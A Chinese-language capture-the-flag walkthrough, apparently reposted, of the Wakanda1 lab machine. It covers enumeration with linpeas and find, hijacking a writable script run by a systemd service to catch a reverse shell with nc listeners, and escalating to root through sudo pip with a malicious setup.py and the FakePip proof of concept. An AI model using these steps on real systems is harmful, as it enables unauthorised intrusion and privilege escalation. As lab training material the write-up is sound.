| 关键词: devops 枚举 脚本 socket antivirus 用户 权限 运行 发现 反弹 |
赋权并执行脚本,linpeas.sh信息枚举: ![]() ![]() ![]() 发现如下新信息: 发现新用户是1002,说明包含了2个权限 root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件 3、find深入枚举1)mamadou用户信息枚举 利用find针对mamadou查看可运行权限文件: ![]() 发现flag1: cat /home/mamadou/flag1.txt ![]() Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc 2)devops用户信息枚举 通过前面脚本枚举还发现存在另一个用户:devops,也利用find针对devops查看其可运行权限文件: find / -user devops 2>&1 | grep -v "Permission denied\|proc" ![]() 返回三个信息,具体查看下 这里返现三个可疑信息: 尝试打开flag2.txt: cat /home/devops/flag2.txt ![]() 提示无权限打开! 尝试打开antivirus.py: cat /srv/.antivirus.py ![]() 发现这是一个可读可写的python脚本! open('/tmp/test','w').write('test') 查看下antivirus是否存在计划任务启动该脚本: find / -name *antivirus* 2>&1 | grep -v "Permission denied\|proc" ![]() 发现存在antivirus.service服务! 查看下该服务内容: cat /lib/systemd/system/antivirus.service ![]() 提示存在该服务存在计划任务,每5分钟devops用户执行一次 接下来利用该计划任务来编译反弹shell! 六、计划任务反弹shell1、写入计划任务本地开启nc端口: nc -tvlp 9999 ![]() nano写入反弹shell ![]() 等5分钟成功反弹devops 用户shell! ![]() 七、内部信息枚举–devops1、组信息枚举cat /etc/group ![]() ![]() developer 2、find查看权限文件利用find针对developer 查看可运行权限文件: find / -group developer 2>&1 | grep -v "Permission denied\|proc" ![]() 发现存在:/usr/bin/pip 可运行文件和flag2 3、获取flagcat /home/devops/flag2.txt ![]() Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098 在整个目录中枚举devops: grep -rn / -e devops 2>&1 | grep -v "Permission denied\|proc" ![]() 没发现新的东西,但是可看到devops的ID为1002是共用的! 4、sudo提权尝试sudo提权: sudo -l ![]() 提示用户可以在/usr/bin/pip执行sudo User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip 八、pip提权pip可执行sudo提权,那就利用pip写入py脚本运行 开启nc反弹shell: nc -vlp 4455 ![]() 本地添加设置脚本setup.py: 将host更改为本地kali地址,端口随拟。 ![]() 配置成功! 到tmp目录下上传setup.py脚本至靶机: ![]() 上传成功! sudo运行脚本setup.py: sudo pip install setup.py . ![]() 成功获得反弹shell! 获得flag: ![]() flag:821ae63dbe0c573eff8b69d451fb21bc 提权pip:拓展思路
poc:[https://github.com/0x00-0x00/FakePip](https://github.com/0x00-0x00/FakePip)用代理下载FakePip包: proxychains git clone https://github.com/0x00-0x00/FakePip.git ![]() 下载成功! 查看脚本机制并配置参数: ![]() 将lhost改为本地kali地址,端口可不变: |
| 本文出处: https://www.toutiao.com/article/7194348346100826663/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|